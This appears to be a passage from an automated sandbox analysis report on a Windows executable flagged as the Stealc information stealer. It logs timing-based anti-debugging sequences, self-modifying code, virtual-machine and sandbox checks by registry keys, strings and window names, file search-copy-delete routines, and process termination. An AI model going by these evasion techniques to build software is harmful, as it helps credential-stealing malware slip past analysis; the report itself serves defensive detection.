Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8CDE second address: BB8CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8FDA second address: BB8FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9152 second address: BB9156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB92A5 second address: BB92D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD95F8844h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB92D1 second address: BB9305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 jmp 00007F0AD8C6A9C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9305 second address: BB930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB930F second address: BB9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC367E second address: BC3688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3688 second address: BC368C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC368C second address: BC36CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b pushad 0x0000000c jne 00007F0AD95F8826h 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F0AD95F8826h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007F0AD95F882Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36CA second address: BC36CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36CE second address: BC36D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36D4 second address: BC36E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0AD8C6A9B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36E4 second address: BC36E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCA48B second address: BCA492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC190 second address: BCC19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC19C second address: BCC1A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC1A2 second address: BCC1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F882Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC1B7 second address: BCC1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF81F second address: BCF829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF829 second address: BCF86A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9CAh 0x0000000e jmp 00007F0AD8C6A9C2h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 jl 00007F0AD8C6A9B6h 0x0000001f jmp 00007F0AD8C6A9C4h 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE17C8 second address: BE17CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE36DD second address: BE36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32AF second address: BE32B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32B3 second address: BE32B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32B7 second address: BE32C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32C8 second address: BE32CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3443 second address: BE3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2F80 second address: BF2F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1DDF second address: BF1E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F0AD95F882Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1E09 second address: BF1E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF28EE second address: BF2904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F0AD95F882Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2904 second address: BF2927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C3h 0x00000007 jo 00007F0AD8C6A9C2h 0x0000000d js 00007F0AD8C6A9B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2A6A second address: BF2A8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 jmp 00007F0AD95F8830h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F0AD95F882Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2A8C second address: BF2A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2A90 second address: BF2AAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0AD95F8831h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F0AD95F8826h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2C42 second address: BF2C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2C4C second address: BF2C76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8836h 0x00000007 jg 00007F0AD95F8826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F0AD95F8826h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF46B0 second address: BF46C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF46C3 second address: BF46D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF46D9 second address: BF46DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF7098 second address: BF70AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F0AD95F882Ch 0x0000000b jnp 00007F0AD95F8826h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF76D0 second address: BF771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0AD8C6A9C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F0AD8C6A9BDh 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F0AD8C6A9C5h 0x0000001d jc 00007F0AD8C6A9BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF771E second address: BF772E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 jl 00007F0AD95F882Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF772E second address: BF7747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0AD8C6A9B8h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B09 second address: BF8B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B26 second address: BF8B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B2C second address: BF8B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B36 second address: BF8B3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B3C second address: BF8B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B48 second address: BF8B52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B52 second address: BF8B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B61 second address: BF8B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA32B second address: BFA330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517050B second address: 517052D instructions: 0x00000000 rdtsc 0x00000002 mov di, 5CA6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F0AD8C6A9BAh 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, edx 0x00000017 mov ebx, 1230CC5Ch 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517052D second address: 5170553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0AD95F882Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170553 second address: 5170557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170557 second address: 517055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517055D second address: 5170563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170563 second address: 5170576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop eax 0x0000000e mov di, 69F0h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51705F4 second address: 5170614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170614 second address: 5170618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170618 second address: 517061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517061C second address: 5170622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 96DBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 96DB17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B17944 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 96DAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B973C3 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_006940F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0068E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00681710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_006947C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00694B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00693B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0068EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00681160 GetSystemInfo,ExitProcess,

0_2_00681160

Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2132664415.0000000001452000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00684610 VirtualProtect ?,00000004,00000100,00000000

0_2_00684610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00699BB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00699AA0 mov eax, dword ptr fs:[00000030h]

0_2_00699AA0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00697690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00697690

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00699790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_006998E0

Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: &CProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006C75A8 cpuid

0_2_006C75A8

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00697D20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00697B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00697B10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_006979E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00697BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00697BC0

Stealing of Sensitive Information

Yara detected Stealc

